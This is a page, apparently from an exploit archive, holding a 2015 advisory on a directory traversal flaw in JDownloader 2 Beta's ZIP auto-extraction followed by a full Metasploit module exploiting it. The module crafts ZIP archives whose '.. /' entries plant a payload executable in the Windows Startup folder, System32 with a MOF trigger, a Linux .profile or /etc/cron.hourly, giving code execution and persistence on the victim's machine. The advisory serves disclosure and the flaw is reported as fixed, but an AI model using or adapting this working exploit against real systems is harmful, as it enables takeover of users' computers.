扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 |
=begin # Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction) # Date: 2015-06-02 # Exploit Author: PizzaHatHacker # Vendor Homepage: http://jdownloader.org/home/index # Software Link: http://jdownloader.org/download/offline # Version: 1171 <= SVN Revision <= 2331 # Contact: PizzaHatHacker[a]gmail[.]com # Tested on: Windows XP SP3 / Windows 7 SP1 # CVE: # Category: remote 1. Product Description Extract from the official website : "JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!" 2. Vulnerability Description & Technical Details JDownloader 2 Beta is vulnerable to a directory traversal security issue. Class : org.appwork.utils.os.CrossSystem Method : public static String alleviatePathParts(String pathPart) This method is called with a user-provided path part as parameter, and should return a valid and safe path where to create a file/folder. This method first checks that the input filepath does not limit itself to a (potentially dangerous) sequence of dots and otherwise removes it : pathPart = pathPart.replaceFirst("\\.+$", ""); However right after this, the value returned is cleaned from starting and ending white space characters : return pathPart.trim(); Therefore, if you pass to this method a list of dots followed by some white space like "..", it will bypass the first check and then return the valid path ".." which is insecure. This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and then tries to extract it. A ZIP file with an entry containing ".. " sequence(s) would cause JD2b to overwrite/create arbitrary files on the target filesystem. 3. Impact Analysis : To exploit this issue, the victim is required to launch a standard ZIP file download. The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will automatically be extracted. By exploiting this issue, a malicious user may be able to create/overwrite arbitrary files on the target file system. Therefore, it is possible to take the control of the victim's machine with the rights of the JDownloader process - typically standard (non-administrator) rights - for example by overwriting existing executable files, by uploading an executable file in a user's autorun directory etc. 4. Common Vulnerability Scoring System * Exploitability Metrics - Access Vector (AV) : Network (AV:N) - Access Complexity (AC) : Medium (AC:M) - Authentication (Au) : None (Au:N) * Impact Metrics - Confidentiality Impact (C) : Partial (C:P) - Integrity Impact (I) : Partial (I:P) - Availability Impact (A) : Partial (A:P) * CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVSS Base Score : 6.8 - Impact Subscore 6.4 - Exploitability Subscore 8.6 5. Proof of Concept - Create a ZIP file with an entry like ".. /poc.txt" - Upload it to an HTTP server (for example) - Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server - JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory OR see the Metasploit Exploit provided. 6. Vulnerability Timeline 2012-04-27 : Vulnerability created (SVN Revision > 1170) 2014-08-19 : Vulnerability identified [...]: Sorry, I was not sure how to handle this and forgot about it for a long time 2015-05-08 : Vendor informed about this issue 2015-05-08 : Vendor response + Code modification (Revision 2332) 2015-05-11 : Code modification (SVN Revision 2333) 2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot) 2015-05-12 : Code modification (SVN Revision 2335) 2015-05-12 : Confirmed to the vendor that the code looks now safe 2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore 2015-06-04 : Disclosure of this document 7. Solution Update JDownloader 2 Beta to the latest version. 8. Personal Notes I am NOT a security professional, just a kiddy fan of security. I was boring so I looked for some security flaws in some software and happily found this. If you have any questions/remarks, don't hesitate to contact me by email. I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-) =end ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize( info = {} ) super( update_info( info, 'Name'=> 'JDownloader 2 Beta Directory Traversal Vulnerability', 'Description' => %q{ This module exploits a directory traversal flaw in JDownloader 2 Beta when extracting a ZIP file (which by default is automatically done by JDL). The following targets are available : Windows regular user : Create executable file in the 'Start Menu\Startup' under the user profile directory. (Executed at next session startup). Linux regular user : Create an executable file and a .profile script calling it in the user's home directory. (Executed at next session login). Windows Administrator : Create an executable file in C:\\Windows\\System32 and a .mof file calling it. (Executed instantly). Linux Administrator : Create an executable file in /etc/crontab.hourly/. (Executed within the next hour). Vulnerability date : Apr 27 2012 (SVN Revision > 1170) }, 'License' => MSF_LICENSE, 'Author'=> [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module 'References'=> [ [ 'URL', 'http://jdownloader.org/download/offline' ], ], 'Platform'=> %w{ linux osx solaris win }, 'Payload' => { 'Space' => 20480, # Arbitrary big number 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Windows Regular User (Start Menu Startup)', { 'Platform' => 'win', 'Depth'=> 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\) 'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/', 'Option' => nil, } ], [ 'Linux Regular User (.profile)', { 'Platform' => 'linux', 'Depth'=> -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/) 'RelativePath' => '', 'Option' => 'profile', } ], [ 'Windows Administrator User (Wbem Exec)', { 'Platform' => 'win', 'Depth'=> 0, # Go up to root (n levels) 'RelativePath' => 'Windows/System32/', 'Option' => 'mof', } ], [ 'Linux Administrator User (crontab)', { 'Platform'=> 'linux', 'Depth'=> 0, # Go up to root (n levels) 'RelativePath' => 'etc/cron.hourly/', 'Option' => nil, } ], ], 'DefaultTarget'=> nil, 'DisclosureDate' => '' )) register_options( [ OptString.new('FILENAME', [ true, 'The output file name.', '']), # C:\Users\Bob\Downloads\XXX\xxx.zip=> 4 # /home/Bob/Downloads/XXX/xxx.zip => 4 OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]), ], self.class) register_advanced_options( [ OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']), ], self.class) end # Traversal path def traversal(depth) result = '.. /' if depth < 0 # Go up n levels result = result * -depth else # Go up until n-th level result = result * (datastore['DEPTH'] - depth) end return result end def exploit # Create a new archive zip = Rex::Zip::Archive.new # Optionally include an initial directory dir = datastore['INCLUDEDIR'] if not dir.nil? and not dir.empty? print_status("Filling archive recursively from path #{dir}") zip.add_r(dir) end # Create the payload executable file path exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '') exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name # Generate the payload executable file content exe_content = generate_payload_exe() # Add the payload executable file into the archive zip_add_file(zip, exe_file, exe_content) # Check all available targets case target['Option'] when 'mof' # Create MOF file data mof_name = rand_text_alpha(rand(6) + 1) + '.mof' mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name mof_content = generate_mof(mof_name, exe_name) zip_add_file(zip, mof_file, mof_content) when 'profile' # Create .profile file bashrc_name = '.profile' bashrc_file = traversal(target['Depth']) + bashrc_name bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}" zip_add_file(zip, bashrc_file, bashrc_content) end # Write the final ZIP archive to a file zip_data = zip.pack file_create(zip_data) end # Add a file to the target zip and output a notification def zip_add_file(zip, filename, content) print_status("Adding '#{filename}' (#{content.length} bytes)"); zip.add_file(filename, content, nil, nil, nil) end end |
体验盒子
